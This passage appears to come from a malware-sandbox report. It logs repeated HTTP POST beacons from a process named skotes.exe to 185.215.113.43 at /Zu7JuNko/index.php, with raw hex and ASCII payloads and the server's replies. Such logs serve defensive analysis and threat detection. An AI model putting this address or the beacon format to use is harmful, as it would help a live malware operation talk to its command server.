                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:33.593786001 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:34.928488970 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:34 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            59192.168.2.450239185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:36.666074991 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:38.079689026 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:37 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            60192.168.2.450242185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:39.708235025 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:41.043965101 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:40 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            61192.168.2.450245185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:42.783786058 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:44.116848946 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:43 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            62192.168.2.450246185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:45.758050919 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:47.140788078 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:46 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            63192.168.2.450249185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:48.868333101 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:50.252310038 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:50 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            64192.168.2.450250185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:51.876358986 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:53.367669106 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:53 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            65192.168.2.450252185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:55.109952927 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:56.542994976 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:56 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            66192.168.2.450254185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:58.178630114 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:59.532824993 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:12:59 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            67192.168.2.450259185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:01.280672073 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:02.610881090 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:02 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            68192.168.2.450260185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:04.249713898 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:05.635802984 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:05 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            69192.168.2.450261185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:07.379831076 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:08.767870903 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:08 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            70192.168.2.450263185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:10.399283886 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:11.790250063 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:11 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            71192.168.2.450266185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:13.529036999 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:14.916877985 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:14 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            72192.168.2.450267185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:16.551058054 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:17.904170990 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:17 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            73192.168.2.450270185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:19.638211966 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
